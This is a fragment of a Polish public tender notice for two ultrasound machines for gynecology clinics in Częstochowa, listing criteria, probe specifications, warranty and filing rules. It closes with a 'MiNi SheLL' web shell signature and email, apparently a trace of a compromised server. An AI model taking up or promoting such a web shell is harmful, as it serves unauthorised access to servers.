kryterium: <span class="normal">Okres udzielonej gwarancji na dostarczony przedmiot zamówienia (</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji serwisowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu - nie dotyczy.<br/>2. cd opisu przedmiotu zamówienia:<br/>Wymagania w zakresie dostawy, montażu, uruchomienia oraz szkolenia personelu Zamawiającego:<br/>W ramach zamówienia Wykonawca dostarczy urządzenie własnym transportem na jego ryzyko i koszt do Poradni Ginekologii i Położnictwa oraz do Poradni Ginekologii Wieku Rozwojowego Wojewódzkiego Zakładu Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą w Częstochowie oraz wykona kompletną instalację oraz konfigurację zgodnie z zaleceniami producenta. <br/>Montaż i uruchomienie powinno być realizowane z wykorzystaniem sprzętu i urządzeń Wykonawcy. Wykonywanie prac nie może zakłócać funkcjonowania obiektu. Wykonywanie najbardziej uciążliwych czynności Wykonawca dostosuje do organizacji pracy w obiekcie<br/>Wykonawca przeprowadzi w siedzibie Zamawiającego szkolenie oferowanego sprzętu wskazanych pracowników. Ewentualne szkody powstałe w związku z wnoszeniem i montażem sprzętu, zostaną usunięte na koszt Wykonawcy.<br/>Wykonawca ponosi odpowiedzialność za szkody wyrządzone w związku z realizacją przedmiotu umowy, na zasadach ogólnych. W przypadku zniszczenia lub uszkodzenia elementów obiektu, istniejącej infrastruktury lub wyposażenia, za które Wykonawca ponosi odpowiedzialność na zasadach ogólnych, Wykonawca zostanie wezwany do naprawy, w odpowiednim terminie wyznaczonym przez Zamawiającego, a w przypadku bezskutecznego upływu terminu wskazanego w wezwaniu Zamawiający dokona niezbędnych napraw na koszt Wykonawcy.<br/><br/>4.	Dostępność dla osób niepełnosprawnych:<br/>Przedmiot zamówienia będzie dostępny również dla osób niepełnosprawnych.<br/>Użytkownikami sprzętu będącego przedmiotem zamówienia będą również osoby niepełnosprawne.<br/>5.	Ponadto, obowiązki Wykonawcy związane z realizacją zamówienia określają także załączone do SWZ projektowane postanowienia umowy – PPU.<br/><br/>6.	Zadanie finansowane w ramach Marszałkowskiego Budżetu Obywatelskiego Województwa Śląskiego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz podmiotowych środków dowodowych na potw. spełniania warunków udziału w post. - nie dotyczy.<br/>2. cd. opisu przedmiotu zamówienia:<br/>4. Głowice:<br/>1) Głowica convex elektroniczna<br/>a)	Zakres częstotliwości pracy głowicy min. 2.0 -5.0 MHz <br/>b)	Liczba fizycznych elementów (kryształów) min. 128<br/>c)	Kąt pola skanowania w trybie B Min. 55°<br/>d)	Głębokość obrazowania min.32 cm<br/>e) Obrazowanie harmoniczne – min. 3 częstotliwości do wyboru <br/>2) Głowica liniowa elektr.<br/>a)	Zakres częstotliwości pracy głowicy min. 5.0- 13.0 MHz<br/>b)	Szerokość pola skanowania min. 38 mm <br/>c)	Liczba fizycznych elementów (kryształów) min. 192<br/>d)	Obrazowanie harmoniczne – min. 3 częstotliwości do wyboru <br/>3) Głowica endowaginalna elektroniczna <br/>a)	Zakres częstotliwości pracy głowicy min. 4.0 -10.0 MHz<br/>b)	Kąt pola skanowania w trybie B min. 165°<br/>c)	Promień R min. 8 mm<br/><br/>d)	Liczba fizycznych elem. (kryształów) min. 128<br/>e)	Obrazowanie harmoniczne – min. 3 częstot.do wyboru <br/><br/>5. Możliwości rozbudowy o następujące elementy: <br/>1) Możliwość rozbudowy o głowicę convex wolumetryczną do obrazowania: 2D, 3D i 3D w czasie rzeczywistym. Zakres częstot.min. 2.0- 6.0 MHz. Przemiatanie min. 400 stopni/sek. <br/>2) Możliwość rozbudowy o głowicę liniową. Zakres częst. pracy <br/>min. 8.0-18.0 MHz, pole widzenia min. 25 mm<br/>3) Możliwość rozbudowy o głowicę sekt. „phased array”, o częst.pracy min. 2.0-4.0 MHz, pole widzenia min. 100 stopni.<br/>4) Możliwość rozbudowy o głowicę microconvex o częst.min. 5,0-10,0 MHz, pole widzenia min. 130 stopni <br/>5) Możliwość rozbud. o opcję obrazowania z użyciem środków kontrastujących<br/>6) Możliwość rozbudowy o oprogramowanie DICOM do kom. w sieci co najmniej DICOM STORE,DICOM WORKLIST<br/>7) Możliwość rozbudowy o specj.oprogramowanie dedykowane <br/>do badania piersi w trybie B-Mode, które po wskazaniu miejsca/zmiany pozwala na min.:<br/>• Automatyczny i półautomatyczny obrys zmian nowotworowych<br/>• Ocenę morfologiczną na podstawie uzyskanego obrysu (wymiary)<br/>• klasyfikacji w skali BI-RADS<br/>• generowania dedykowanego raportu z badania piersi<br/>8) Możliwość rozbudowy o protokół automat.skanowania i analizy tarczycy z klasyfikacją TI-RADS<br/>9) Możliwość rozbudowy o tryb Dopplera ciągłego i tkankowego<br/>6.	Gwarancja i serwis<br/>1) Szkolenie indywidualne wskazanych przez Z. osób. <br/>2) Bezpłatna aktualizacja oprogr.w okresie gwarancyjnym przepr.przez producenta oferowanego sprzętu. W momencie zakupu aparatu odblokowane w aparacie oprogramowanie staje się własnością Z.. Oprogramowanie, udzielone licencje i podł.e do systemu informatycznego nie wygasa po okresie gwarancji.<br/>3) Okres gwarancji – min. 36 miesięcy liczony o daty podpisania protokołu odbioru końcowego.<br/>Okres gwarancji stanowi kryterium o ceny ofert.<br/>Okres rękojmi równy jest okresowi gwarancji.<br/>4) Wymagania w zakresie serwisu: <br/>Maks. (wymagalny) czas reakcji serwisowej wynosi 48 godzin od momentu zgłoszeniu przez Zamawiającego usterki lub wady.<br/>Czas reakcji serwisowej wynosi stanowi kryt. oceny ofert.<br/>Czas reakcji serwisu, tj. przybycie serwisanta, diagnoza wady lub usterki i jej usuniecie wynosi maksymalnie 48 godz.(liczone w dni robocze) od momentu zgłoszenia przez Z. usterki lub wady. Czas reakcji serwisowej liczony będzie od momentu zgł. przez Z. usterki lub wady telefonicznie lub drogą elektroniczną w okresie obowiązywania zadeklarowanej przez Wykonawcę gwarancji.<br/>W przypadku, gdy naprawa wymaga spr.a części, termin ten może ulec wydłużeniu o czas niezbędny do sprowadzenia tych części.<br/>5) Okres gwarancji na cały system min. 36 miesięcy<br/>6) Aparat wyposażony w moduł umożliwiający zdalne serwisowanie, zdalną diagnostykę aparatu przez sieć internetową przy pomocy inżynierów serwisowych. Moduł serwisowy, umożliwiający przeładowanie oprog., możliwość zdalnej korekty parametrów obrazowania z wyświetlaniem na ekranie serwisanta obrazu na żywo z aparatu.<br/>8.	Inne<br/>1)	Wbudowana multimedialna instrukcja obsługi aparatu. <br/>Dod. instrukcja obsługi w języku pol. w formie elektr. (pdf) 1 szt. i drukowanej – 2 szt.,<br/>(...)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2.	W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań równoważnych w rozumieniu art. 99 ust. 5 lub art. 101 ust. 4 ustawy Pzp, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowana oferta/rozwiązania równoważne spełniają wymagania Zamawiającego opisane w przedmiocie zamówienia. Jeżeli Wykonawca nie złoży ww. dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia). Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wraz z ofertą należy złożyć:<br/>1.1.	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania zakresie wskazanym w rozdziale V SWZ – zgodnie z załącznikiem nr 2 do SWZ. Oświadczenia stanowią dowód potwierdzający brak podstaw z postępowania na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe, wskazane w SWZ. Oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/><br/>1.2.	Załącznik nr 1A do SWZ – Formularz - Szczegółowa oferta przedmiotowa, który należy złożyć pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>1.3.	Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego (jeśli dotyczy).<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/><br/>Uwaga nr 1:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>4.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5.	W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenia, o których mowa w art. 125 ustawy (Rozdział XI ust. 3.1. SWZ) - składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, zawiera załącznik nr 3 do SWZ.<br/><br/>1.1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami zawartymi w załączniku nr 3 do SWZ.<br/><br/>1.2.	Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.<br/><br/>2.	Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-08 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia zakładki „Oferty/wnioski” widocznej w podglądzie przedmiotowego postępowania po zalogowaniu się na konto Wykonawcy na Platformie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Ofertę należy sporządzić na formularzu oferty lub według takiego samego schematu, stanowiącego załącznik nr 1 do SWZ.<br/>Ofertę należy złożyć pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>2.	Oferta wraz z załącznikami musi być złożona za pośrednictwem zakładki „Oferty/wnioski” udostępnionej na platformie e-zamówienia. <br/>3. Zamawiający wykluczy z post. Wykonawcę w przypadkach, o których mowa<br/>w art. 108 ust. 1 pkt 1-6 ustawy (obligatoryjne przesłanki wykluczenia) oraz w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022 r. o szczeg. rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie<br/>bezpieczeństwa narodowego.<br/>4. Pełna nazwa zamówienia:<br/>Dostawa 2 aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego. Zadanie realizowane w ramach Marszałkowskiego Budżetu Obywatelskiego Województwa Śląskiego pn:<br/> &#34;Zakup aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego Wojewódzkiego Zakładu Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą z siedzibą w Częstochowie.&#34;

Creat By MiNi SheLL
Email: jattceo@gmail.com